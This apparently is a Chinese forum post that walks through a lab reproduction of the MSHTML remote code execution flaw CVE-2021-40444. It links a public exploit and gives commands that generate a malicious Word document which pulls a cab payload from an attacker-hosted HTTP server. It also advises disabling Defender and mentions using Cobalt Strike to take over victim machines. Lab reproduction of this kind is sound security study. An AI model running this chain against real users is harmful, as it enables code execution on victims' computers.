用户
搜索
  • TA的每日心情
    无聊
    2021-11-20 18:35
  • 签到天数: 82 天

    连续签到: 1 天

    [LV.6]常住居民II

    版主

    bilibili:末心a

    Rank: 7Rank: 7Rank: 7

    105

    主题

    324

    帖子

    3029

    魔法币
    收听
    0
    粉丝
    11
    注册时间
    2018-8-22

    楚春秋达人积极活跃奖限定版春秋段子手推广达人春秋文阁

    M0x1n 版主 bilibili:末心a 楚 春秋达人 积极活跃奖 限定版春秋段子手 推广达人 春秋文阁 楼主
    发表于 2021-11-19 04:20:13 11809
    本帖最后由 M0x1n 于 2021-11-19 04:24 编辑

    风御安全团队·末心 2021年11月6日
    0x01漏洞简述
    视频地址:https://www.bilibili.com/video/BV1sF411Y7pg/

    2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。
    经过对威胁文件的分析,基本上就是它会去请求服务器获取一个cab文件,并且会通过执行cpl文件去执行一个inf。
    1.png

    MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word、Excel或PowerPoint文档中呈现Web托管的内容,AcitveX控件是微软COM架构下的产物,在Windows的Office套件、IE浏览器中有广泛的应用,利用ActiveX控件即可与MSHTML组件进行交互。
    该漏洞影响:
    Windows Server, version 20H2 (Server Core Installation)
    Windows Server, version 2004 (Server Core installation)
    Windows Server 2022 (Server Core installation)
    Windows Server 2022
    Windows Server 2019 (Server Core installation)
    Windows Server 2019
    Windows Server 2016 (Server Core installation)
    Windows Server 2016
    Windows Server 2012 R2 (Server Core installation)
    Windows Server 2012 R2
    Windows Server 2012 (Server Core installation)
    Windows Server 2012
    Windows Server 2008 for x64-based Systems Service Pack 2 (Server Coreinstallation)
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 32-bit Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 32-bit Systems Service Pack 2
    Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Coreinstallation)
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows RT 8.1
    Windows 8.1 for x64-based systems
    Windows 8.1 32-bit systems
    Windows 7 for x64-based Systems Service Pack 1
    Windows 7 32-bit Systems Service Pack 1
    Windows 10 for x64-based Systems
    Windows 10 32-bit Systems
    Windows 10 Version 21H1 for x64-based Systems
    Windows 10 Version 21H1 for ARM64-based Systems
    Windows 10 Version 21H1 32-bit Systems
    Windows 10 Version 20H2 for x64-based Systems
    Windows 10 Version 20H2 for ARM64-based Systems
    Windows 10 Version 20H2 32-bit Systems
    Windows 10 Version 2004 for x64-based Systems
    Windows 10 Version 2004 for ARM64-based Systems
    Windows 10 Version 2004 32-bit Systems
    Windows 10 Version 1909 for x64-based Systems
    Windows 10 Version 1909 for ARM64-based Systems
    Windows 10 Version 1909 32-bit Systems
    Windows 10 Version 1809 for x64-based Systems
    Windows 10 Version 1809 for ARM64-based Systems
    Windows 10 Version 1809 32-bit Systems
    Windows 10 Version 1607 for x64-based Systems
    Windows 10 Version 1607 32-bit Systems

    该漏洞可导致代码执行!

    0x02漏洞环境 1.png
    Kali IP :172.31.44.252
    Windows Server 2019 和 Office10 IP: 192.168.32.132(记得设置为NAT,复现不成功大部分都是因为这个)

    1.png
    1.png
    可以与路由等连通
    0x03基础构建
    今天我们使用一个新的环境:WSL运行的Kali子系统,配合Win-Kex环境。
    1.png



    apt-get install lcab
    如果无法下载,可以使用debian的源或者从debian的源中直接下载、构建:
    wget http://ftp.debian.org/debian/poo ... _1.0b12.orig.tar.gz
    tar zxvf lcab_1.0b12.orig.tar.gz
    cd lcab-1.0b12
    ./configure
    make
    sudo make install
    安装lcab

    1.png

    我们使用https://github.com/lockedbyte/CVE-2021-40444这个EXP,已经帮网络不好的同学放到了Gitee上:https://gitee.com/moxinwangluo/CVE-2021-40444
    下面我们执行命令,创建文件。
    python3 exploit.py generate test/calc.dllhttp://172.31.44.252:80
    1.png


    在我们的exploit目录下面的out文件夹中,已经生成了document.docx文件。
    1.png

    python3 exploit.py host 80

    我们启动了一个http服务,服务的根目录在exploit目录下的/srv里。
    启动一个Kex看一下这个文件
    1.png
    可以看出,这里是向外请求了一个文件,也就是通过这个word重新请求到了我的服务器上,拿了这个cab文件。
    Ie浏览器要启动Activex控件和插件(我在想,Windows7复现是不是更简单???)
    1.png

    记得要禁用Defender

    如果你是Server的Windows用户,要记得关闭Internet Explorer的增强安全配置


    1.png
    选择开发者工具

    1.png
    配置Word
    1.png
    打开后弹出了各种ie的Payload,但是没有弹窗口,可能是Ie浏览器的设置不对。
    我们也可以在document.docx文件中进行一些修改,配合Cs来“上线”我们的机器。

    打开后弹出了各种ie的Payload,但是没有弹窗口,可能是Ie浏览器的设置不对。
    我们也可以在document.docx文件中进行一些修改,配合Cs来“上线”我们的机器。


    微信公众号:末心网安 | Q群374327762 | 淘宝店铺:末心网络|TinSec(听安)
    支持作者学习了
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册